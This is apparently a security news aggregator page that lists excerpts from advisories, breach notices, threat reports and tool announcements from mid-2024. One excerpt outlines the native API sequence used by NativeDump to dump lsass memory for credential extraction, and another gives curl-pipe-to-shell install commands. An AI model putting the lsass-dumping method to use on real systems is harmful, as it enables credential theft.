TL;DR Release of Conkeyscan – A Confluence Keyword/Secret Scanner, which is tailored towards pentesters. Secrets Everywhere Many companies, especially larger ones, need to store knowledge in a centralized way. A wiki is the usual choice for this. One product that is frequently used for this purpose is Confluence from Atlassian. Similar to how sensitive data […]
https://blog.compass-security.com/2024/06/introducing-conkeyscan-confluence-keyword-scanner/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with DeepJavaLibrary - CVE-2024-37902
Publication Date: 2024/06/17 10:30 AM PDT
AWS is aware of CVE-2024-37902, relating to a potential issue with the archive extraction utilities for DeepJavaLibrary (DJL). On May 15, 2024, we released version 0.28.0 to address this issue. If you are using an affected version (0.1.0 through 0.27.0), we recommend you upgrade to 0.28.0 or higher.
For additional information, please refer to the DJL release notes.
Security-related questions or concerns can be brought to our attention via aws-security@amazon.com.
https://aws.amazon.com/security/security-bulletins/AWS-2024-007/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Zadig & Voltaire - 586,895 breached accounts
In June 2024, a data brach sourced from French fashion brand Zadig & Voltaire was publicly posted to a popular hacking forum. The data included names, email and physical addresses, phone numbers and genders. When contacted about the incident, Zadig & Voltaire advised the incident had occurred more than 6 months ago and that "all measures were taken quickly".
https://haveibeenpwned.com/PwnedWebsites#ZadigVoltaire
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GCP HMAC Keys are not discoverable or revokable other than for self
GCP administrators face challenges in managing HMAC keys within their organizations,
lacking visibility into which user accounts have generated these keys and whether they are
actively being used to access storage objects. Additionally, there's a lack of functionality
to revoke keys associated with other users, restricting their ability to enforce security
policies effectively. Similarly, GCP incident response teams rely on Cloud Logging to monitor
Cloud Storage object access, but they lack specific indicators to determine if HMAC keys are
being utilized in these access attempts.
https://www.cloudvulndb.org/gcp-hmac-keys-unauditable
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)
NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams). NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream NtOpenProcess to get a handle for the lsass process NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the...
http://www.kitploit.com/2024/06/nativedump-dump-lsass-using-only-native.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Alleged Boss of ‘Scattered Spider' Hacking Group Arrested
A 22-year-old man from the United Kingdom arrested this week in Spain is allegedly the ringleader of Scattered Spider, a cybercrime group suspected of hacking into Twilio, LastPass, DoorDash, Mailchimp, and nearly 130 other organizations over the past two years.
https://krebsonsecurity.com/2024/06/alleged-boss-of-scattered-spider-hacking-group-arrested/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Driving forward in Android drivers
@import url(https://themes.googleusercontent.com/fonts/css?kit=MXVwpSGzOOhqOc5hUWJbBLizfYjsfH9XaeDpmRKYJN5bV0WvE1cEyAoIq5yYZlSc);.lst-kix_3dxxrae9diso-3>li:before{content:"25cf "}.lst-kix_m966q2gfyys4-7>li:before{content:"" counter(lst-ctn-kix_m966q2gfyys4-7,lower-latin) ". "}.lst-kix_3dxxrae9diso-2>li:before{content:"25a0 "}.lst-kix_3dxxrae9diso-4>li:before{content:"25cb "}.lst-kix_m966q2gfyys4-6>li:before{content:"" counter(lst-ctn-kix_m966q2gfyys4-6,decimal) ". "}.lst-kix_m966q2gfyys4-8>li:before{content:"" counter(lst-ctn-kix_m966q2gfyys4-8,lower-roman) ". "}.lst-kix_kbd3zqh16g9u-4>li{counter-increment:lst-ctn-kix_kbd3zqh16g9u-4}.lst-kix_3dxxrae9diso-1>li:before{content:"25cb "}.lst-kix_3dxxrae9diso-5>li:before{content:"25a0 "}ol.lst-kix_m966q2gfyys4-3.start{counter-reset:lst-ctn-kix_m966q2gfyys4-3...
https://googleprojectzero.blogspot.com/2024/06/driving-forward-in-android-drivers.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Security Challenges Introduced by Modern Software Development
Understand how modern software development is changing security threats.
https://www.legitsecurity.com/blog/security-challenges-introduced-by-modern-software-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cinterion EHS5 3G UMTS/HSPA Module Research
We performed the security analysis of a Telit Cinterion modem in course of a bigger project of security assessment of a popular model of a truck and found eight vulnerabilities.
https://securelist.com/telit-cinterion-modem-vulnerabilities/112915/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Time to challenge yourself in the 2024 Google CTF
Hlynur Gudmundsson, Software EngineerIt's Google CTF time! Install your tools, commit your scripts, and clear your schedule. The competition kicks off on June 21 2024 6:00 PM UTC and runs through June 23 2024 6:00 PM UTC. Registration is now open at goo.gle/ctf.Join the Google CTF (at goo.gle/ctf), a thrilling arena to showcase your technical prowess. The Google CTF consists of a set of computer security puzzles (or challenges) involving reverse-engineering, memory corruption, cryptography, web technologies, and more. Participants can use obscure security knowledge to find exploits through bugs and creative misuse, and with each completed challenge your team will earn points and move up through the ranks. The top 8 teams of the Google CTF will qualify for our Hackceler8 competition...
http://security.googleblog.com/2024/06/time-to-challenge-yourself-in-2024.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NIST's International Cybersecurity and Privacy Engagement Update – Mexico City, RSA Conference, and More
The last few months have brought even more opportunities for NIST to engage with our international partners to enhance cybersecurity. Here are some updates on our recent international engagement: Conversations have continued with our partners throughout the world on the recent release of the Cybersecurity Framework Version 2.0 . NIST international engagement continues through our support to the Department of State and the International Trade Administration (ITA) during numerous international dialogues. Most recently, NIST participated in interagency dialogues to share information on NIST
https://www.nist.gov/blogs/cybersecurity-insights/nists-international-cybersecurity-and-privacy-engagement-update-mexico
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with Amazon EC2 VM Import Export Service
Publication Date: 2024/06/11 10:30 AM PDT
AWS is aware of an issue with the Amazon Elastic Compute Cloud (Amazon EC2) VM Import Export Service (VMIE). On April 12, 2024, we addressed this issue and can confirm new Windows OS imports are not affected.
When using the EC2 VMIE service to import a VM using Windows OS, customers can optionally use their own Sysprep answer file. Before April 12, 2024, the EC2 VMIE service had an issue where, if a customer imported a VM using Windows OS to use as an AMI or instance, then an identical backup copy of the answer file would be created without sensitive data being removed if included in the file. This backup file is only accessible to on-instance Windows users who had permission to access the customer-provided answer file.
For customers...
https://aws.amazon.com/security/security-bulletins/AWS-2024-006/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with AWS Deployment Framework - CVE-2024-37293
Publication Date: 2024/06/11 09:00 AM PDT
AWS is aware of the issues described in CVE-2024-37293, relating to the open-source AWS Deployment Framework (ADF). These issues affect the bootstrap process that is responsible to deploy ADF's bootstrap stacks to facilitate multi-account cross-region deployments. The ADF bootstrap process relies on elevated privileges to perform this task. Two versions of the bootstrap process exist; a code-change driven pipeline using AWS CodeBuild and an event-driven state machine using AWS Lambda. If an actor has permissions to change the behavior of the CodeBuild project or the Lambda function, they would be able to escalate their privileges. We have addressed this issue in version 4.0 and above. We recommend that customers upgrade to the latest version...
https://aws.amazon.com/security/security-bulletins/AWS-2024-005/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
QR code SQL injection and other vulnerabilities in a popular biometric terminal
The report analyzes the security properties of a popular biometric access control terminal made by ZKTeco and describes vulnerabilities found in it.
https://securelist.com/biometric-terminal-vulnerabilities/112800/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 March 2024 Cyber Attacks Timeline
In the first timeline of March 2024, I collected 98 events, once again characterized malware and ransomware attacks. State-sponsored threat actor were equally quite active, but the timeline also features some interesting events related to cyberwarfare.
https://www.hackmageddon.com/2024/06/10/1-15-march-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing 2FA with phishing and OTP bots
Explaining how scammers use phishing and OTP bots to gain access to accounts protected with 2FA.
https://securelist.com/2fa-phishing/112805/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sttr - Cross-Platform, Cli App To Perform Various Operations On String
sttr is command line software that allows you to quickly run various transformation operations on the string. // With input promptsttr// Direct inputsttr md5 "Hello World"// File inputsttr md5 file.textsttr base64-encode image.jpg// Reading from different processor like cat, curl, printf etc..echo "Hello World" | sttr md5cat file.txt | sttr md5// Writing output to a filesttr yaml-json file.yaml > file-output.json :movie_camera: Demo :battery: Installation Quick install You can run the below curl to install it somewhere in your PATH for easy use. Ideally it will be installed at ./bin folder curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh Webi MacOS / Linux curl -sS https://webi.sh/sttr | sh Windows curl.exe https://webi.ms/sttr | powershell...
http://www.kitploit.com/2024/06/sttr-cross-platform-cli-app-to-perform.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
PIP-INTEL - OSINT and Cyber Intelligence Tool
Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface simplifying the data collection and analysis processes for researchers and cybersecurity professionals. Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches. Download Pip-Intel
http://www.kitploit.com/2024/06/pip-intel-osint-and-cyber-intelligence.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Oracle WebLogic Server Vulnerabilities (CVE-2023-21839, CVE-2017-3506)
What is the attack?A threat actor known as “8220 Gang” is seen exploiting two vulnerabilities in the Oracle WebLogic server: CVE-2017-3506, which allows remote OS command execution, and CVE-2023-21839 is an insecure deserialization vulnerability. CISA recently added the Oracle WebLogic flaw tracked as CVE-2017-3506 to its known exploited vulnerabilities catalog on 3 June 2023.What is the recommended Mitigation?Apply the most recent patch released by Oracle. In the advisory, Oracle mentioned that they continue to receive reports of exploitation attempts.What FortiGuard Coverage is available?FortiGuard customers remain protected by the IPS signatures available for both vulnerabilities. FortiGuard Outbreak Alert is available to review for full coverage and the FortiGuard Incident Response...
https://fortiguard.fortinet.com/threat-signal-report/5466
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Don't Protect Your Software Supply Chain, Defend the Entire Software Factory
Find out why a too-narrow definition of "supply chain" may be hindering software security efforts.
https://www.legitsecurity.com/blog/dont-protect-your-software-supply-chain-defend-the-entire-software-factory
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
February 2024 Cyber Attacks Statistics
In February 2024 I collected and analyzed 239 events. Cyber Crime continued to lead the Motivations chart with 68.6%. Operations driven by Cyber Espionage ranked at number two with 16.7%, ahead of Cyber Warfare (4.6%) and Hacktivism (3.3%).
https://www.hackmageddon.com/2024/06/04/february-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Blockchain / Smart Contract Bugs
To identify and understand threats and weaknesses of smart contracts, it is important to be at least familiar with common smart contract bugs and vulnerabilities, how they can be leveraged by a malicious attacker, and how these issues can be mitigated.
This blog article aims to raise awareness about common smart contract vulnerabilities and their corresponding mitigation strategies.
https://blog.compass-security.com/2024/06/blockchain-smart-contract-bugs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Combolists Posted to Telegram - 361,468,099 breached accounts
In May 2024, 2B rows of data with 361M unique email addresses were collated from malicious Telegram channels. The data contained 122GB across 1.7k files with email addresses, usernames, passwords and in many cases, the website they were entered into. The data appears to have been sourced from a combination of existing combolists and info stealer malware.
https://haveibeenpwned.com/PwnedWebsites#TelegramCombolists
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
IT threat evolution in Q1 2024. Mobile statistics
Mobile malware statistics for Q1 2024: most common threats for Android, mobile banking Trojans, and ransomware Trojans.
https://securelist.com/it-threat-evolution-q1-2024-mobile-statistics/112750/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Check Point Quantum Security Gateways Information Disclosure Vulnerability (CVE-2024-24919)
What is the attack?A zero-day vulnerability affecting Check Point Security Gateways is being exploited by attackers to gain remote access. The vulnerability can allow an attacker to read sensitive information on Check Point Security Gateways enabled with remote Access VPN or Mobile Access Software Blades. Check Point issued an advisory on Monday, warning that threat actors are actively targeting their Remote Access VPN devices in an ongoing campaign to infiltrate enterprise networks.What is the recommended Mitigation?Check Point has released the hotfix for CVE-2024-24919 and extra measures that should be taken to mitigate the risks. FortiGuard recommends users to apply the emergency hotfix provided and follow instructions as mentioned on the vendor's advisory. https://support.checkpoint.com/results/sk/sk182336...
https://fortiguard.fortinet.com/threat-signal-report/5464
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
16-29 February 2024 Cyber Attacks Timeline
In the second timeline of February 2024 I collected 100 events characterized by a majority of malware and ransomware attacks and by a plethora of cyber espionage and cyber warfare campaigns.
https://www.hackmageddon.com/2024/05/30/16-29-february-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Operation Endgame - 16,466,858 breached accounts
In May 2024, a coalition of international law enforcement agencies took down a series of botnets in a campaign they coined "Operation Endgame". Data seized in the operation included impacted email addresses and passwords which were provided to HIBP to help victims learn of their exposure.
https://haveibeenpwned.com/PwnedWebsites#OperationEndgame
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NextGen Healthcare Mirth Connect RCE (CVE-2023-43208, CVE-2023-37679)
What is the vulnerability?NextGen Healthcare Mirth Connect is vulnerable to unauthenticated remote code execution (CVE-2023-43208) caused due to an incomplete patch of a Command Injection flaw (CVE-2023-37679). Mirth Connect is an open-source data integration platform widely used by healthcare companies. It enables the management of information using bi-directional sending of many types of messages. Attackers could exploit this vulnerability for initial access or to compromise sensitive healthcare data. CISA has recently added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog on May 20th, 2024. What is the recommended Mitigation?Users are advised to update to the latest version of NextGen Healthcare Mirth Connect as per the vendor's instructions. What FortiGuard Coverage...
https://fortiguard.fortinet.com/threat-signal-report/5460
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Genesis Market Malware Attack
What is the attack?The FortiGuard Lab's EDR team recently identified malware infection exhibiting strong similarities to the previously reported Genesis Market malicious campaign that was dismantled by law enforcement in early 2023. The investigation traced some initial compromises to tools used for circumventing software licensing and counterfeit GPG MSI installers embedded with PowerShell scripts. Following the initial infection, the malware deploys a victim-specific DLL into the machine's memory. This malware targets Edge, Chrome, Brave, and Opera browsers by installing a "Save to Google Drive" extension, which it uses to steal login credentials and sensitive personal data.What is Genesis Market?Genesis Market is a black market that deals in stolen login credentials, browser cookies,...
https://fortiguard.fortinet.com/threat-signal-report/5461
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
On Fire Drills and Phishing Tests
Matt Linton, Chaos SpecialistIn the late 19th and early 20th century, a series of catastrophic fires in short succession led an outraged public to demand action from the budding fire protection industry. Among the experts, one initial focus was on “Fire Evacuation Tests”. The earliest of these tests focused on individual performance and tested occupants on their evacuation speed, sometimes performing the tests “by surprise” as though the fire drill were a real fire. These early tests were more likely to result in injuries to the test-takers than any improvement in survivability. It wasn't until introducing better protective engineering - wider doors, push bars at exits, firebreaks in construction, lighted exit signs, and so on - that survival rates from building fires began to improve....
http://security.googleblog.com/2024/05/on-fire-drills-and-phishing-tests.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unfading Sea Haze: New Espionage Campaign in the South China Sea
Bitdefender researchers investigated a series of incidents at high-level
organizations in countries of the South China Sea region, all performed by the
same threat actor we track as Unfading Sea Haze. Based on the victimology and
the cyber-attack's aim, we believe the threat actor is aligned with China's
interests.
As tensions in the region rise, they are reflected in the intensification of
activity on behalf of the Unfading Sea Haze actor, which uses new and improved
tools and TTPs.
We notice
https://www.bitdefender.com/blog/labs/unfading-sea-haze-new-espionage-campaign-in-the-south-china-sea/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Building DDoS Botnets with TP-Link and Netgear Routers
Threat actors double down with their botnet building efforts. Vulnerable Netgear routers join exploitable TP-Link and other IoT devices, expanding attacker DDoS capabilities.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-april-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Check Your Wallet? How Mobile Driver's Licenses are Changing Online Transactions
Can you recall the last time you opened a bank account? It's likely you walked into a local bank branch and spoke to a representative who asked for your driver's license and social security card to verify your identity. Now imagine you want to create a bank account online. The process is likely similar—type in your social security number, take a picture of your driver's license, and submit both to the bank via their webpage. Seems straightforward, right? Identity verification is important—it protects us from identity theft and reduces the risk of fraud and unauthorized access for organizations
https://www.nist.gov/blogs/cybersecurity-insights/check-your-wallet-how-mobile-drivers-licenses-are-changing-online
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing the Gateway: Why Protecting Build Systems Is Crucial in Modern Software Development
Understand why securing build systems is as important as securing production systems.
https://www.legitsecurity.com/blog/why-protecting-build-systems-is-crucial-in-modern-software-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to become a Hacker
Introduction Last year, I attended a job fair organized by the Association of Computer Science Students at ETH Zürich. It was a rewarding experience to be able to share my day-to-day work in a field I am so passionate about. We got to talk to numerous students at different stages of their studies, as well […]
https://blog.compass-security.com/2024/05/how-to-become-a-hacker/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Survey Finds a Paradox of Confidence in Software Supply Chain Security
Get results of and analysis on ESG's new survey on supply chain security.
https://www.legitsecurity.com/blog/new-survey-finds-a-paradox-of-confidence-in-software-supply-chain-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Internal Azure Container Registry writable via exposed secret
A Microsoft employee accidentally published credentials via a git commit to a public repository.
These credentials granted privileged access to an internal Azure Container Registry (ACR) used by Azure,
which reportedly held container images utilized by multiple Azure projects, including Azure IoT Edge, Akri,
and Apollo. The privileged access could have allowed an attacker to download private images as well
as upload new images and (most importantly) overwrite existing ones. In theory, an attacker could have
leveraged the latter to implement a supply chain attack against these Azure projects and their users.
However, it is currently unknown precisely which images this ACR contained or how they were used,
so the effective impact of this issue remains undetermined.
https://www.cloudvulndb.org/azure-internal-acr-secret
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
I/O 2024: What's new in Android security and privacy
Posted by Dave Kleidermacher, VP Engineering, Android Security and Privacy
Our commitment to user safety is a top priority for Android. We've been consistently working to stay ahead of the world's scammers, fraudsters and bad actors. And as their tactics evolve in sophistication and scale, we continually adapt and enhance our advanced security features and AI-powered protections to help keep Android users safe.
In addition to our new suite of advanced theft protection features to help keep your device and data safe in the case of theft, we're also focusing increasingly on providing additional protections against mobile financial fraud and scams.
Today, we're announcing more new fraud and scam protection features coming in Android 15 and Google Play services updates later this...
http://security.googleblog.com/2024/05/io-2024-whats-new-in-android-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most
popular IoT devices, hunting for vulnerabilities and undocumented attack
avenues. This report documents four vulnerabilities affecting devices powered by
the ThroughTek Kalay Platform. Due to the platform's massive presence in IoT
integrations, these flaws have a significant downstream impact on several
vendors.
In the interconnected landscape of the Internet of Things (IoT), the reliability
and security of devices,
https://www.bitdefender.com/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Avast Q1/2024 Threat Report
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign
The post Avast Q1/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q1-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q1-2024-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Verizon 2024 DBIR: Key Takeaways
Get key data points and takeaways from the 2024 Verizon Data Breach Investigations Report.
https://www.legitsecurity.com/blog/verizon-2024-dbir-key-takeaways
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google and Apple deliver support for unwanted tracking alerts in Android and iOS
Google and Apple have worked together to create an industry specification – Detecting Unwanted Location Trackers – for Bluetooth tracking devices that makes it possible to alert users across both Android and iOS if such a device is unknowingly being used to track them. This will help mitigate the misuse of devices designed to help keep track of belongings. Google is now launching this capability on Android 6.0+ devices, and today Apple is implementing this capability in iOS 17.5.
With this new capability, Android users will now get a “Tracker traveling with you” alert on their device if an unknown Bluetooth tracking device is seen moving with them over time, regardless of the platform the device is paired with.
If a user gets such an alert on their Android device, it means...
http://security.googleblog.com/2024/05/google-and-apple-deliver-support-for.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Reel HackTheBox Walkthrough
Summary Reel is a windows Active Directory machine and is considered as a hard box in HTB. This box stands out for its uniqueness, featuring
The post Reel HackTheBox Walkthrough appeared first on Hacking Articles.
https://www.hackingarticles.in/reel-hackthebox-walkthrough/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Latest NICE Framework Update Offers Improvements for the Cybersecurity Workforce
I joined NIST as the first full-time manager of the NICE Framework in October 2020, just one short month before NICE published the first revision NIST Special Publication 800-181, the NICE Workforce Framework for Cybersecurity (NICE Framework). That revision – far from finalizing work – was the starting point that led us to a complete refresh of the NICE Framework components, which includes: Revised Work Role Categories and Work Roles – including one new Work Role. Eleven new Competency Areas that extend the Framework's cybersecurity knowledge and skills. Updated Task, Knowledge, and Skill
https://www.nist.gov/blogs/cybersecurity-insights/latest-nice-framework-update-offers-improvements-cybersecurity
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Exploiting Race Condition using Turbo Intruder
In web security, a race condition refers to a scenario where the behaviour of a web application is influenced by the sequence or timing of
The post Exploiting Race Condition using Turbo Intruder appeared first on Hacking Articles.
https://www.hackingarticles.in/exploiting-race-condition-using-turbo-intruder/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 February 2024 Cyber Attacks Timeline
In the cyber attacks timeline of February H1 2024, I collected 139 events dominated by malware attacks. Ransomware and vulnerabilities also played an important role in the threat landscape.
https://www.hackmageddon.com/2024/05/08/1-15-february-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4.0 release candidate now available!
The ClamAV 1.4.0 release candidate is now available.You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.4.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags.The release candidate phase is expected...
http://blog.clamav.net/2024/05/clamav-140-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing the Vault: ASPM's Role in Financial Software Protection
Safeguarding software integrity is crucial, especially in vital industries such as finance. According to a report by Carbon Black, the financial sector experiences an average of 10,000 security alerts per day, outstripping most other industries. As the technology landscape evolves and expands, it's imperative that your defenses strengthen alongside it. So, how do leading financial institutions shore up their cyber defenses and protect their software assets? The answer is Application Security Posture Management (ASPM). Join us as we explore ASPM's transformative impact on security practices in the U.S. financial services sector.
https://www.legitsecurity.com/blog/securing-the-vault-aspms-role-in-financial-software-protection
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bug Bounty: Insights from Our First-hand Experience
At Compass Security, we recently launched our managed bug bounty service. We openly invite hunters to probe our publicly exposed services for vulnerabilities. In return for their valuable feedback, we offer monetary bounties up to CHF 5000. This blog posts presents an interesting vulnerability found by a hunter on the bug bounty program of our subsidiary, Hacking-Lab.
https://blog.compass-security.com/2024/05/bug-bounty-insights-from-our-first-hand-experience/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lethal Injection
Multiple vulnerabilities were uncovered in Azure Health Bot service, Microsoft's health chatbot platform.
These could have potentially exposed sensitive user data and granted attackers extensive control, allowing
unrestricted code execution as root on the bot backend, unrestricted access to authentication secrets &
integration auth providers, unrestricted memory read in the bot backend, exposing sensitive secrets,
allowing cross-tenant data access and unrestricted deletion of other tenants' public resources.
These issues stemmed from various bugs related to URL sanitization, shared compute, and sandboxing.
Following disclosure, Microsoft changed the service architecture to run a completely separate ACI
instance per customer, thereby mitigating future sandbox escapes, and changed the sandboxing...
https://www.cloudvulndb.org/lethal-injection
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Protecting Model Updates in Privacy-Preserving Federated Learning: Part Two
The problem The previous post in our series discussed techniques for providing input privacy in PPFL systems where data is horizontally partitioned. This blog will focus on techniques for providing input privacy when data is vertically partitioned . As described in our third post , vertical partitioning is where the training data is divided across parties such that each party holds different columns of the data. In contrast to horizontally partitioned data, training a model on vertically partitioned data is more challenging as it is generally not possible to train separate models on different
https://www.nist.gov/blogs/cybersecurity-insights/protecting-model-updates-privacy-preserving-federated-learning-part-two
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Your Google Account allows you to create passkeys on your phone, computer and security keys
Sriram Karra and Christiaan Brand, Google product managersLast year, Google launched passkey support for Google Accounts. Passkeys are a new industry standard that give users an easy, highly secure way to sign-in to apps and websites. Today, we announced that passkeys have been used to authenticate users more than 1 billion times across over 400 million Google Accounts.As more users encounter passkeys, we're often asked questions about how they relate to security keys, how Google Workspace administrators can configure passkeys for the user accounts that they manage, and how they relate to the Advanced Protection Program (APP). This post will seek to clarify these topics.Passkeys and security keysPasskeys are an evolution of security keys, meaning users get the same security benefits, but...
http://security.googleblog.com/2024/05/passkeys-on-your-phone-computer-and-security-keys.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Take A Tour! NIST Cybersecurity Framework 2.0: Small Business Quick Start Guide
The U.S. Small Business Administration is celebrating National Small Business Week from April 28 - May 4, 2024. This week recognizes and celebrates the small business community's significant contributions to the nation. Organizations across the country participate by hosting in-person and virtual events, recognizing small business leaders and change-makers, and highlighting resources that help the small business community more easily and efficiently start and scale their businesses. To add to the festivities, this NIST Cybersecurity Insights blog showcases the NIST Cybersecurity Framework 2.0
https://www.nist.gov/blogs/cybersecurity-insights/take-tour-nist-cybersecurity-framework-20-small-business-quick-start
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Where does your software (really) come from?
GitHub is working with the OSS community to bring new supply chain security capabilities to the platform.
The post Where does your software (really) come from? appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/where-does-your-software-really-come-from/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Detecting browser data theft using Windows Event Logs
Posted by Will Harris, Chrome Security Team
.code {
font-family: "Courier New", Courier, monospace;
font-size: 11.8px;
font-weight: bold;
background-color: #f4f4f4;
padding: 2px;
border: 1px solid #ccc;
border-radius: 2px;
white-space: pre-wrap;
display: inline-block;
line-height: 12px;
}
.highlight {
color: red;
}
Chromium's sandboxed process model defends well from malicious web content, but there are limits to how well the application can protect itself from malware already on the computer. Cookies and other credentials remain a high value target for attackers, and we are trying to tackle this ongoing threat in multiple ways, including working on web standards like
DBSC
that will help disrupt the cookie theft industry...
http://security.googleblog.com/2024/04/detecting-browser-data-theft-using.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sensor Intel Series: Top CVEs in March 2024
TP-Link Archer AX21 Wifi Router targeting, plus a handful of new CVEs! See what mass scanning looks like in March 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-march-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How we fought bad apps and bad actors in 2023
Posted by Steve Kafka and Khawaja Shams (Android Security and Privacy Team), and Mohet Saxena (Play Trust and Safety)
A safe and trusted Google Play experience is our top priority. We leverage our SAFE (see below) principles to provide the framework to create that experience for both users and developers. Here's what these principles mean in practice:
(S)afeguard our Users. Help them discover quality apps that they can trust.
(A)dvocate for Developer Protection. Build platform safeguards to enable developers to focus on growth.
(F)oster Responsible Innovation. Thoughtfully unlock value for all without compromising on user safety.
(E)volve Platform Defenses. Stay ahead of emerging threats by evolving our policies, tools and technology.
With those principles in mind, we've made...
http://security.googleblog.com/2024/04/how-we-fought-bad-apps-and-bad-actors-in-2023.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CodeQL zero to hero part 3: Security research with CodeQL
Learn how to use CodeQL for security research and improve your security research workflow.
The post CodeQL zero to hero part 3: Security research with CodeQL appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/codeql-zero-to-hero-part-3-security-research-with-codeql/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GraphNinja
A vulnerability in Microsoft Graph allowed attackers to conduct password-spray attacks without detection.
The issue involved switching the 'common' authentication endpoint with that of an unrelated tenant,
thereby avoiding the appearance of logon attempts in the victim's logs.
This technique could allow attackers to validate user credentials through verbose error messages,
but actual successful logons using these credentials would still be recorded in the victims' logs (regardless of endpoint).
https://www.cloudvulndb.org/graph-ninja
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Disk Group Privilege Escalation
Disk Group Privilege Escalation is a complex attack method targeting vulnerabilities or misconfigurations within the disk group management system of Linux environments. Attackers might focus
The post Disk Group Privilege Escalation appeared first on Hacking Articles.
https://www.hackingarticles.in/disk-group-privilege-escalation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Accelerating incident response using generative AI
